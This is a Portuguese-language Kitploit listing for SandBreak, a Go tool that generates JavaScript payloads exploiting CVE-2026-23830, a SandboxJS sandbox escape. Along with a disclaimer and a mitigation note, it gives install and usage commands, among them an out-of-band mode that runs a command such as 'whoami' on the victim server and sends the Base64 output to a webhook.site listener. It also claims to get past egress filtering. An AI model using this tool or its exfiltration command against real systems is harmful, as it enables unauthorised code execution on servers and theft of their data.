Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23830-SandBreak — Gera e entrega payloads de exploração para CVE-2026-23830, uma fuga do SandboxJS, com modos para exfiltração OOB cega e PoC local de calculadora. Suporta listeners HTTP/HTTPS e produz payloads JavaScript minificados. | Kitploit
Ferramentas/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

Gera e entrega payloads de exploração para CVE-2026-23830, uma fuga do SandboxJS, com modos para exfiltração OOB cega e PoC local de calculadora. Suporta listeners HTTP/HTTPS e produz payloads JavaScript minificados.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
16há 7 mesesAinda não revisado
Compartilhar

SandBreak

Gerador de Exploit CVE-2026-23830 e Ferramenta Auto-Pwn

Go Version License Type

SandBreak é uma ferramenta robusta de geração de exploits baseada em Go, projetada para explorar a vulnerabilidade de Escape do SandboxJS (CVE-2026-23830).

Esta ferramenta explora o construtor AsyncFunction não protegido em versões antigas do sandboxjs, permitindo que atacantes escapem do ambiente sandbox V8 e executem código arbitrário no sistema host. Ela suporta múltiplos modos de payload, incluindo Exfiltração OOB Cega, Defacement e RCE Baseado em Erro.


Recursos

  • 2 Modos de Ataque:
    • oob: Exfiltração de Dados Out-of-Band (HTTP/HTTPS) para cenários cegos.
  • calc: Abre calc.exe (PoC Clássico).
  • OOB Inteligente: Detecta automaticamente HTTP vs HTTPS para evitar travamentos do servidor.
  • Baseado em Go: Binário único, sem dependências necessárias na máquina do atacante.
  • Leve: Gera payloads JavaScript puros e minificados.

  • Instalação

    Clone o repositório e execute:

    root@kitploit:~
    git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
    cd CVE-2026-23830-SandBreak
    go run CVE-2026-23830.go
    

    Uso

    root@kitploit:~
    go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
    

    1. Modo OOB (RCE Cego - Profissional)

    Use este modo quando não houver feedback de saída. Ele executa o comando e envia o resultado codificado em Base64 para o seu listener (ex.: webhook.site).

    root@kitploit:~
    go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
    

    Contorna com sucesso travamentos básicos de filtragem de egresso ao lidar com erros de rede.

    2. Modo Calc (Teste Local)

    Abre uma calculadora no servidor Windows.

    root@kitploit:~
    go run CVE-2026-23830.go -mode calc
    

    Prova de Conceito (PoC)

    Cenário: Exfiltração OOB

    Atacante recebendo os dados do usuário do servidor via Webhook, apesar de não haver saída visual no site.


    Aviso Legal

    Esta ferramenta foi criada apenas para Fins Educacionais e Testes de Penetração Autorizados.

    • Não use esta ferramenta em sistemas que você não possui ou para os quais não tem permissão explícita para testar.
    • O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.

    Mitigação

    Atualize o sandboxjs para a versão mais recente, onde o construtor AsyncFunction é devidamente isolado no sandbox.

    root@kitploit:~
    npm update sandboxjs
    

    Autor: Meysam Bal-afkan

    Licença: MIT

    Baixar ferramenta